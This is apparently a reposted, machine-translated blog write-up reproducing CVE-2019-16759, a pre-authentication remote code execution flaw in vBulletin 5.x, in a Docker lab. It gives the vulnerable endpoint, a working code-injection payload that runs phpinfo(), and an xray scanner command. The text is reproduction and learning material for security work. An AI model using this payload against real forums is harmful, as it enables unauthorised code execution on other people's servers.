CVE-2019-16759 vBulletin 5.x事前認証rce复现

以下のチャネルで私に連絡することができます、記事のソースアドレスを示してください〜

中国のid:フラッシュ
知っている:Sp4rkW
GITHUB:Sp4rkW
ステーションB:技術紳士
ブログ:https
://sp4rkw.blog.csdn.net/連絡先メール:[email protected]

Githubは大きな男のデモを見て、それが0dayだと思っていましたが、後でそれが昨年からの穴であることがわかりましたが、再発が完了したので、ブログを記録して書いてください。

環境設定

ドッカーを直接ドラッグ

docker run -ti -p 80:80 --name vbulletin -d p8361/vbulletin-cve-2015-7808

次に、設定を変更します

docker exec -it 517 /bin/bash

# update然后装vim
apt-get update
apt install vim

# 改配置
vim /etc/apache2/apache2.conf
# 最下面补这个配置
ServerName localhost:80

# 给根目录下run.sh权限并启动
chmod +x ./run.sh
./run.sh

POC検証

/ajax/render/widget_tabbedcontainer_tab_panel
routestring=ajax%2Frender%2Fwidget_php&widgetConfig[code]=phpinfo();exit;

ここに画像の説明を挿入
X線スキャン

.\xray_windows_amd64.exe webscan --plugins phantasm --poc ".\poc\vbulletin-cve-2019-16759.yml"  --url http://192.168.1.109/ --html-output test1.html  

ここに画像の説明を挿入

おすすめ

転載: blog.csdn.net/wy_97/article/details/107943672